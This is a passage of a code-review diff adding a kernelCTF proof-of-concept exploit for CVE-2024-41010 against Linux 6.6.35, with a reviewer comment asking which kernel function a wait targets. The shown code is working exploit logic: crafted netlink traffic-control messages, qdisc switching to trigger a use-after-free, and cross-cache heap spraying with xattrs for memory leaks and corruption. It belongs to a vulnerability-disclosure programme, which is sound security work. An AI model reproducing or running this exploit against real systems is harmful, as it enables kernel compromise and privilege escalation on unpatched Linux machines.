pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c

```diff
@@ -0,0 +1,871 @@
+{
+	strcpy((void*)0x300004a8, kind);
+	syscall(__NR_sendmsg, /*fd=*/sock1, /*msg=*/0x300006c0ul, /*f=*/0ul);
+}
+
+__attribute__((always_inline)) void chain0(void)
+{
+	*(uint64_t*)0x30010280 = 0;
+	*(uint32_t*)0x30010288 = 0;
+	*(uint64_t*)0x30010290 = 0x30010240;
+	*(uint64_t*)0x30010298 = 1;
+	*(uint64_t*)0x300102a0 = 0;
+	*(uint64_t*)0x300102a8 = 0;
+	*(uint32_t*)0x300102b0 = 0;
+
+	*(uint64_t*)0x30010240 = 0x30010340;
+	*(uint64_t*)0x30010248 = 0x24;
+
+	/* struct nlmsghdr */
+	*(uint32_t*)0x30010340 = 0x24;  // nlmsg_len
+	*(uint16_t*)0x30010344 = 100;   // nlmsg_type
+	*(uint16_t*)0x30010346 = 0xf31; // nlmsg_flags
+	*(uint32_t*)0x30010348 = 0;     // nlmsg_seq
+	*(uint32_t*)0x3001034c = 0;     // nlmsg_pid
+
+	/* struct tcmsg */
+	*(uint8_t*)0x30010350 = 0;      // tcm_family
+	*(uint8_t*)0x30010351 = 0;      // tcm__pad1
+	*(uint16_t*)0x30010352 = 0;     // tcm__pad2
+	*(uint32_t*)0x30010354 = 0xFFFFFFFF;    // tcm_ifindex
+	*(uint16_t*)0x30010358 = 0;     // tcm_handle
+	*(uint16_t*)0x3001035a = 0;
+	*(uint32_t*)0x3001035c = 1;     // tcm_parent	// tcm_block_index
+	*(uint16_t*)0x30010360 = 0;     // tcm_info
+	*(uint16_t*)0x30010362 = 0;
+
+	syscall(__NR_sendmsg, /*fd=*/sock1, /*msg=*/0x30010280ul, /*f=*/0ul);
+}
+
+void trigger_uaf_write(int pip1[], int pip2[], int affi)
+{
+	int fd;
+	uint64_t t[4] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0x0};
+	intptr_t ret = 0;
+	char step[10];
+
+	cpu_affinity(affi);
+	unshare_setup(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET);
+
+	set_network();
+
+	syscall(__NR_mmap, /*addr=*/0x30000000ul, /*len=*/0x1000000ul, /*prot=*/7ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
+	
+	ret = syscall(__NR_sendmsg, /*fd=*/sock1, /*msg=*/0x300006c0ul, /*f=*/0ul);
+	
+	qdisc_init();
+	qdisc_set("ingress");
+
+	chain0();
+
+	qdisc_set("clsact");
+	read(pip1[0], step, 10);
+	/* ------------- change to ingress (ctx alloc) ---- ------- */
+
+	cross_cache_spray1();
+
+	qdisc_set("ingress");
+
+	if(!passer) 
+	{
+		syscall(SYS_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1);	// kfree_rcu wait
+		usleep(usleep_time);
+	}
+
+	cross_cache_spray2();
+	cross_cache_remove_all_chunk();
+
+
+	write(pip2[1], "step 2", 4);
+	/* ------------ uaf write ------------ */
+	read(pip1[0], step, 10);
+
+	_exit(0);
+}
+
+
+uint64_t *trigger_spray_chunks(int pip1[], int pip2[])
+{
+	char step[10];
+
+	unshare_setup(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET);
+	spray_simple_xattr_for_leak_first(FIRST_SPRAY_SZ);
+
+	/* ------------- <exploit alloc, cross cache alloc & exploit free, cross cache free> --------------- */
+
+	write(pip1[1], "step 1", 4);
+	read(pip2[0], step, 10);
+
+	spray_simple_xattr_for_leak_second(FIRST_SPRAY_SZ);
+	printf("[+] spray xattr, which would be overwriten\n");
+
+	/* -------------------- <exploit write> ------------------------- */
+
+	write(pip1[1], "step 3", 4);
+
+	/* ---------------------- heap oob read ---------------------------------- */
+	printf("[*] waiting for exit...\n");
```

Comment:
Comment here what are you waiting for exactly (which kernel function to be run). More details about this is in the [style guide](https://google.github.io/security-research/kernelctf/style_guide#sleeping--waiting).